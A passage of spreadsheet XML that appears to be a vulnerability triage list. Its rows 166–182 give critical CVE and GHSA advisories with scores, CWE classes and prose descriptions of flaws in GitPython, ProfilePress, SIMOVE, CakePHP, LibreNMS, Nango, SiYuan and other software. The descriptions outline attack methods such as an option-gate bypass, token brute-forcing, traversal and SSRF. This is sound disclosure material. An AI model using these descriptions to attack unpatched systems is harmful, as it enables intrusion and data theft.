      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr"/>
      <c r="Q166" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a broken access control vulnerability in videoViewsInfo endpoints that returns complete user records including password hashes, recovery tokens, and live session identifiers to unauthenticated callers when a hash parameter is provided. Attackers can use the disclosed session identifier to hijack viewer sessions, including administrator accounts, and obtain sensitive personal data for all video viewers.</t>
        </is>
      </c>
      <c r="S166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86190</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>GHSA-9557-234j-7rv9</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr">
        <is>
          <t>pip:GitPython</t>
        </is>
      </c>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr"/>
      <c r="P167" s="5" t="inlineStr"/>
      <c r="Q167" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-284h-m62q-gf8w. This link is maintained to preserve external references.
## Original Description
GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.</t>
        </is>
      </c>
      <c r="S167" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-9557-234j-7rv9</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>GHSA-cw2r-r7mw-j3hc</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr"/>
      <c r="P168" s="5" t="inlineStr"/>
      <c r="Q168" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-v396-v7q4-x2qj. This link is maintained to preserve external references.
## Original Description
GitPython 3.1.50 fails to recognize joined short-option forms such as -u&lt;value&gt; (the short form of --upload-pack=&lt;value&gt;) when enforcing its default unsafe-option gate. When an application passes attacker-influenced clone options into Repo.clone_from(..., multi_options=..., allow_unsafe_options=False), an attacker can supply -u&lt;helper&gt; to bypass the gate that blocks --upload-pack/-u, causing Git to execute the specified helper command during clone. Fixed in 3.1.51.</t>
        </is>
      </c>
      <c r="S168" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-cw2r-r7mw-j3hc</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66047</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr"/>
      <c r="Q169" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-330</t>
        </is>
      </c>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>ProfilePress (wp-user-avatar) WordPress plugin before 4.17.2 contains an unauthenticated remote code execution vulnerability that allows unauthenticated attackers to install and activate arbitrary plugins by brute-forcing a weak 32-bit connect token via the ppress_connect_process AJAX handler. Attackers can supply a caller-controlled URL through the file request parameter to trigger silent plugin installation and activation, achieving PHP code execution as the web-server user.</t>
        </is>
      </c>
      <c r="S169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66047</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67367</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr"/>
      <c r="Q170" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in SIMOVE Fleetmanager V3.1 (All versions &lt; V3.1.13), SIMOVE Fleetmanager V3.2 (All versions &lt; V3.2.4), SIMOVE Fleetmanager V3.3 (All versions &lt; V3.3.2), SIMOVE Fleetmanager V4.0 (All versions &lt; V4.0.1), SIPLANT V1.7 (All versions), SIPLANT V2.2 (All versions), SIPLANT V3.0 (All versions), SIPLANT V3.1 (All versions &lt; V3.1.4). Affected devices do not properly validate and neutralize directory traversal sequences in the file-serving endpoint of the embedded HTTP server. This could allow an unauthenticated remote attacker to read arbitrary files from the underlying operating system without any credentials, potentially exposing sensitive data such as credential stores, private keys, and configuration secrets.</t>
        </is>
      </c>
      <c r="S170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67367</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77635</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr">
        <is>
          <t>composer:cakephp/cakephp, composer:cakephp/database</t>
        </is>
      </c>
      <c r="M171" s="5" t="inlineStr">
        <is>
          <t>5.1.10, 5.2.15, 5.3.7</t>
        </is>
      </c>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr"/>
      <c r="P171" s="5" t="inlineStr"/>
      <c r="Q171" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>### Impact
The `FunctionsBuilder::jsonValue($field, $jsonPath)` methods with the Postgres driver is vulnerable to SQL injection if user controlled data is supplied to the `$jsonPath` parameter.
### Patches
5.1.10, 5.2.15, 5.3.7 
### Workarounds
Don't provide user controlled data to these functions/parameters.</t>
        </is>
      </c>
      <c r="S171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77635</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K172" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr"/>
      <c r="Q172" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R172"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S172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84189</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr"/>
      <c r="Q173" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>LibreNMS through 26.4.0 renders JSON fields (name, ip, model, author, commit message) returned by the admin-configurable Oxidized integration URL (oxidized.url) into the device showconfig page without applying htmlspecialchars(). An administrator who points the Oxidized URL at an attacker-controlled server (SSRF) can cause it to return malicious JSON, resulting in stored/persistent cross-site scripting affecting all users who view any device's showconfig tab. Fixed in 26.7.0.</t>
        </is>
      </c>
      <c r="S173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84189</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84197</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr"/>
      <c r="Q174" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297, CWE-300</t>
        </is>
      </c>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ditto's Node.js JavaScript client, all released versions of @eclipse-ditto/ditto-javascript-client-node from 2.0.0 to 3.9.0 and of its predecessor package @eclipse-ditto/ditto-javascript-client-node_1.0 from 1.0.0 to 2.1.0, the WebSocket transport hard-codes rejectUnauthorized: false when creating the underlying ws WebSocket. Certificate chain and hostname validation are therefore disabled for every wss:// connection, and no builder option, constructor argument or environment variable lets an application turn validation back on. An attacker in a position to intercept the connection can present an arbitrary certificate, complete the TLS handshake, read the credentials that the configured authentication provider sends in the Authorization header of the WebSocket upgrade request, and read, alter or inject Ditto Protocol messages for the lifetime of the connection. The Java client, the browser/DOM JavaScript client and the HTTP transport of the Node.js client are not affected.</t>
        </is>
      </c>
      <c r="S174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85427</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr"/>
      <c r="Q175" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos pAntler through 10.0.1 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary programs by publishing a crafted MISSION_FILE message to the MOOSDB. Attackers can publish a mission file containing malicious Run entries that pAntler parses and executes via execvp() without authentication validation.</t>
        </is>
      </c>
      <c r="S175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85427</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85614</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr"/>
      <c r="Q176" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 contains an unauthenticated server-side request forgery vulnerability in the GET /tools/site-checker endpoint that accepts a fully client-controlled URL parameter with no private IP filtering or DNS-rebinding protection. Attackers can make the OpenPanel server issue requests to internal services, localhost, and cloud metadata endpoints, reading internal HTTP response titles, headers, status codes, and SSL certificate information.</t>
        </is>
      </c>
      <c r="S176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85614</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9317</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr"/>
      <c r="Q177" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>Nango before 0.71.6 contains a missing authentication vulnerability in the runner tRPC server that allows unauthenticated attackers to execute arbitrary JavaScript code by invoking the exposed start procedure without credentials. Attackers with network access to the runner port can send requests to the unauthenticated start procedure, bypassing the unenforced RUNNER_SECRET_KEY environment variable, to achieve remote code execution within the runner process.</t>
        </is>
      </c>
      <c r="S177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9317</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>GHSA-g64v-qqpg-v37h</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>go:github.com/siyuan-note/siyuan/kernel</t>
        </is>
      </c>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr"/>
      <c r="P178" s="5" t="inlineStr"/>
      <c r="Q178" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-7j72-f6wg-cxw6. This link is maintained to preserve external references.
## Original Description
SiYuan versions before v3.7.3 contain an authentication bypass vulnerability in publish mode where content-returning endpoints getHeadingChildrenDOM, getHeading*Transaction, and getBacklinkDoc perform no password check despite protecting the primary getDoc endpoint. Anonymous attackers can retrieve full content of password-protected documents by obtaining internal block IDs from reader-accessible endpoints and calling unprotected content endpoints to bypass the password gate.</t>
        </is>
      </c>
      <c r="S178" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-g64v-qqpg-v37h</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>GHSA-xx34-6cjg-prh8</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr">
        <is>
          <t>go:github.com/siyuan-note/siyuan/kernel</t>
        </is>
      </c>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr"/>
      <c r="P179" s="5" t="inlineStr"/>
      <c r="Q179" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-v684-q882-jgmq. This link is maintained to preserve external references.
## Original Description
SiYuan before v3.7.4 fails to properly validate publish access for encrypted notebooks, treating them as publicly accessible by default. Anonymous readers can enumerate and retrieve fully decrypted document content from unlocked encrypted notebooks through the publish API without authentication or key material.</t>
        </is>
      </c>
      <c r="S179" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-xx34-6cjg-prh8</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17057</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr"/>
      <c r="Q180" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service and affect data integrity due to missing authentication for critical functions.</t>
        </is>
      </c>
      <c r="S180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17057</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17207</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr"/>
      <c r="Q181" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service and compromise integrity due to a buffer overflow.</t>
        </is>
      </c>
      <c r="S181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17207</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18664</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="L182" s="5" t="inlineStr"/>
